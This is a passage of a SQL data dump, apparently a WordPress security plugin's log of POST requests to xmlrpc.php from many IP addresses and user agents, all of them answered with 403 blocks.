Safari\\/537.36\"}','KC2c4O7QmnWVYhdjxz8aGZ5A',0,1680863533.2111,576,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','xb4GqSjFatMQ3yhzLPk8JCHp',0,1680863538.6988,558,'','POST',403,0,515,0,1,'',0),('46.101.182.98',778417762,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','eUxgu9qbt4hLQIHFakWJnX3Y',0,1680863553.5591,550,'','POST',403,0,515,0,1,'',0),('94.237.124.100',1592622180,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','IHvhJQTzqP8D2pt3oZdX7MVE',0,1680863556.4550,568,'','POST',403,0,515,0,1,'',0),('91.231.84.41',1541887017,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hoUGFTNHR1ricZdVtn8zXgqM',0,1680864209.0794,1330,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','ln1xwvgqR0aiYzZUQDJ2GLMI',0,1680865532.3663,1846,'','POST',403,0,515,0,1,'',0),('185.98.5.176',3110208944,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','jhKnoqld9HvILmu4SZREMyx2',0,1680865554.1498,548,'','POST',403,0,515,0,1,'',0),('136.243.5.53',2297627957,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','VjPhfTmnLgGuDAJZB0cUNksr',0,1680865558.0538,533,'','POST',403,0,515,0,1,'',0),('104.37.86.31',1747277343,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','aUlMsSHuWfJmqnKF4rVEeB2w',0,1680865567.9498,545,'','POST',403,0,515,0,1,'',0),('34.79.92.113',575626353,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','jSq0NZFgsUGW1rtvmpzXYK63',0,1680865580.3698,710,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','gpaHL08ly2RViFYPWKs7CtBr',0,1680865581.0897,644,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','lhwPs9bCK4OEvWLGmIS28pze',0,1680865587.3379,1102,'','POST',403,0,515,0,1,'',0),('137.184.211.244',2310591476,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','I4RBZ1eK6sUNPrWYJ7blQcEv',0,1680865588.1404,1116,'','POST',403,0,515,0,1,'',0),('68.178.229.122',1152574842,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','nfwsi7vXucTIKMt35RyEPWhr',0,1680865602.0024,564,'','POST',403,0,515,0,1,'',0),('86.48.23.13',1445992205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','6Z8iDSQ1n9Oxu2eUTrPGhHCk',0,1680870315.0669,4466,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','wO4SeK3RfXFnAdtvJ12NWGTM',0,1680870319.9637,1816,'','POST',403,0,515,0,1,'',0),('45.140.185.41',764197161,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','xJ8MXBhDG06ISiyVau5g71Lm',0,1680870331.7967,573,'','POST',403,0,515,0,1,'',0),('91.214.169.69',1540794693,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','tnhr5TlFZ81C6OegPDIiqyko',0,1680870342.3719,614,'','POST',403,0,515,0,1,'',0),('185.179.82.133',3115537029,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','r9tRJPMXFBW2YfUCGTgVo5hd',0,1680870343.3052,559,'','POST',403,0,515,0,1,'',0),('137.184.211.244',2310591476,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','G8Eq4jectsYlh72bkMgDWm5z',0,1680870346.2161,577,'','POST',403,0,515,0,1,'',0),('92.222.36.83',1558062163,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','dmL2ZuD6THlAsPz5NVrjoYbc',0,1680870348.5340,614,'','POST',403,0,515,0,1,'',0),('51.178.95.118',867327862,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','3K1wuNE6v0WtQyYa25hGAXgV',0,1680870354.0596,547,'','POST',403,0,515,0,1,'',0),('54.38.197.19',908510483,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','k9OoEWK6jnZ0Uw1iRYpmzPCg',0,1680870361.8646,1090,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','VGiyMxa1hUvm5XdRrSJeI7LY',0,1680870362.2847,1011,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','FC8TDhYS2E3utdOcX9pUK1Ny',0,1680870365.2085,698,'','POST',403,0,515,0,1,'',0),('103.3.1.158',1728250270,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','QCDUq6S0HXFwLiEZtTfRbK7j',0,1680870370.6593,584,'','POST',403,0,515,0,1,'',0),('184.168.96.211',3098042579,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','8XEpbOZQBf5eVL9yjzYug0hW',0,1680870864.2501,752,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','IjvChmXQ8R3fOuZWtB0MLaod',0,1680870865.9206,596,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','q756jfMOGP2EndbyAeRLcB0C',0,1680870877.2906,616,'','POST',403,0,515,0,1,'',0),('185.182.56.150',3115726998,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Wusz9VnjvdF6foaDS5eiJA84',0,1680870883.4464,700,'','POST',403,0,515,0,1,'',0),('159.223.93.124',2682215804,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','rvHXPmoz9LM2Ya10R5fq7WUS',0,1680870884.2967,598,'','POST',403,0,515,0,1,'',0),('15.206.123.128',265190272,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','7yma3CYzOARGZkVI08xoHeh1',0,1680870891.3796,1680,'','POST',403,0,515,0,1,'',0),('78.46.136.94',1311672414,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','pBCzxLH8JDf5ueoZKbslngWj',0,1680870892.1580,1397,'','POST',403,0,515,0,1,'',0),('67.23.226.46',1125638702,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','OrRfsJacbS2Y1PjZNDk7KBVh',0,1680870899.5210,614,'','POST',403,0,515,0,1,'',0),('192.30.89.67',3223214403,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','RwsNOkELqDnpS1GfXiM8TC6v',0,1680872076.4783,3339,'','POST',403,0,515,0,1,'',0),('146.70.76.43',2454080555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','iKm4YyWj3Nw0EkOBuQCzL2ar',0,1680883142.6417,732,'','POST',403,0,515,0,1,'',0),('194.147.142.107',3264450155,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','80QAVI2m3ZUwvkbjJgB1TeGP',0,1680883615.7107,1006,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','g9wX8OhioqGHayF7u20rZDcl',0,1680883619.4751,2997,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','Qc4gPjIzEZXshGUYoFR29wbO',0,1680883619.2532,3220,'','POST',403,0,515,0,1,'',0),('103.9.227.178',1728701362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','ryw8CVXFDPcQRbh7ixpWkOE0',0,1680883631.4095,932,'','POST',403,0,515,0,1,'',0),('46.105.97.186',778658234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','4vC5oiIzTgQs6fRJW0qES7tl',0,1680883632.2627,1339,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','iDIVWj0pvC4KzwEmLkUnoHdO',0,1680883636.3129,2113,'','POST',403,0,515,0,1,'',0),('72.167.69.17',1218921745,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','v0LInQ5Sh9leoWtK6ixMqwBm',0,1680883641.5576,695,'','POST',403,0,515,0,1,'',0),('159.223.93.124',2682215804,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','a0s5QRyMK8YJ6Vl7hZ4UAqG1',0,1680883644.4075,597,'','POST',403,0,515,0,1,'',0),('213.152.162.149',3583550101,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','UCzjWAq9O3vNnlZfkybRMEmx',0,1680884337.6084,611,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','50osHjnKZQIU4BM2AevaE3Pf',0,1680885889.1222,690,'','POST',403,0,515,0,1,'',0),('185.232.250.86',3119053398,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','utmiEKhYJfWN7d5aXyU4Fs6D',0,1680885895.2030,1320,'','POST',403,0,515,0,1,'',0),('60.205.95.181',1020092341,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','pa5CjbnxEhA0lwS6VFBOWHfz',0,1680885898.9408,1349,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','fLAhOY48SwobQIVCxNzcXK2k',0,1680885899.0408,1328,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','OdqfAYPRLFZJgQ1CknhljrKH',0,1680885907.9129,550,'','POST',403,0,515,0,1,'',0),('198.38.88.243',3324401907,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','boXtPLBTgNYMsm4qrQUenuj8',0,1680885910.7367,582,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','Kzw8Obg2xduoyRBDsNAvaIXG',0,1680885914.3991,553,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','wIsX5UgOfP6xm7BRl1kcDyzJ',0,1680885920.4108,546,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','OWRfpE7t0sNJH1Vu9B4jCQoP',0,1680885921.9425,554,'','POST',403,0,515,0,1,'',0),('85.25.213.84',1427756372,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','IF43sCjgbBA2DZ8opcHY6nwd',0,1680885941.1784,545,'','POST',403,0,515,0,1,'',0),('184.75.221.35',3091979555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','mjSrudgQCbLok7cs8vaVK0PJ',0,1680887810.0111,3011,'','POST',403,0,515,0,1,'',0),('89.238.166.235',1508812523,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','9HjbU38Dpk2TlgKWf0LsnAuB',0,1680889001.9435,1503,'','POST',403,0,515,0,1,'',0),('89.238.166.235',1508812523,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','epP0usVTMcvXwWIhYQa5NylA',0,1680889064.8542,2688,'','POST',403,0,515,0,1,'',0),('193.148.16.211',3247706323,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vq4xWiEl038YfptcXHV2ZwTk',0,1680889797.9706,1513,'','POST',403,0,515,0,1,'',0),('104.254.90.195',1761499843,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','FH1sf3WieQLUOjNGx8BmpcDz',0,1680890360.9095,605,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','AdSjD86cLz71H3l4wxyWhtbk',0,1680890758.2545,3283,'','POST',403,0,515,0,1,'',0),('129.226.138.214',2179107542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Ln2NgUGVhe38q6x4ICjufDA7',0,1680890763.1773,583,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','b6Qk5o8p91SEjTXlwWqzMKcy',0,1680890766.7846,608,'','POST',403,0,515,0,1,'',0),('45.77.175.167',760065959,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','kjd3NzPyeUChMfLruWtvZDw1',0,1680890772.2831,1885,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','QZbgIh0uKMxNlk8XLCBzEcwJ',0,1680890776.5168,557,'','POST',403,0,515,0,1,'',0),('198.23.62.79',3323412047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','yZpegJHc9ETlor4Lhsx2qW3j',0,1680890779.7571,559,'','POST',403,0,515,0,1,'',0),('54.249.226.226',922346210,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','Azp3bePZRjKs0lY2MgNhucDd',0,1680890788.9488,553,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','lc5aAyidugMIt2Wvp93hKexr',0,1680890799.4274,614,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','WK3bFxfoMIkdJwlsyaXhQHnY',0,1680890822.6031,561,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','2iFjJLNa6AUWSPXb7YpwfrQD',0,1680890963.2817,631,'','POST',403,0,515,0,1,'',0),('66.29.132.22',1109230614,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','bVi0o2dCY5e4j7KBtGJSvcUa',0,1680890965.5249,559,'','POST',403,0,515,0,1,'',0),('103.9.227.178',1728701362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','iBGMuHo5a2ZW3NfKsVYnkAzg',0,1680890969.4024,549,'','POST',403,0,515,0,1,'',0),('66.29.132.22',1109230614,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','UDmP8Ki4Rc9CALxFqdb0r6Jf',0,1680890986.3168,563,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','QZxXGcSdBC7fDNPWh26HaT98',0,1680890989.5219,1294,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','mY9P8ekFzCNtbrH7Ov6QaxTs',0,1680890998.3256,558,'','POST',403,0,515,0,1,'',0),('86.105.9.67',1449724227,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Wj8yxRVkhlTpAuJgUMatce14',0,1680892717.3766,4047,'','POST',403,0,515,0,1,'',0),('46.183.220.203',783801547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','9r0zdeFUMR2aHQ1CvEtGjLxc',0,1680893226.7569,599,'','POST',403,0,515,0,1,'',0),('192.30.89.51',3223214387,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','W0R7nKBdtjSXoczUJfVDh5qk',0,1680893551.7460,595,'','POST',403,0,515,0,1,'',0),('185.185.89.10',3115931914,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','ZuaczC3tl7k2qUgfMLKh1BFi',0,1680894920.4028,3188,'','POST',403,0,515,0,1,'',0),('157.245.152.250',2650118394,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','uBaSgzy4pNT7FfnEZKdVDY1w',0,1680894939.6420,819,'','POST',403,0,515,0,1,'',0),('143.42.194.250',2401944314,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','v7XlCdRJL5hSVW10P4NEKbxB',0,1680894940.2668,747,'','POST',403,0,515,0,1,'',0),('103.92.235.82',1734142802,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','K8eyWiYMuJVOhX9cwLTo7QPG',0,1680894947.3106,1479,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 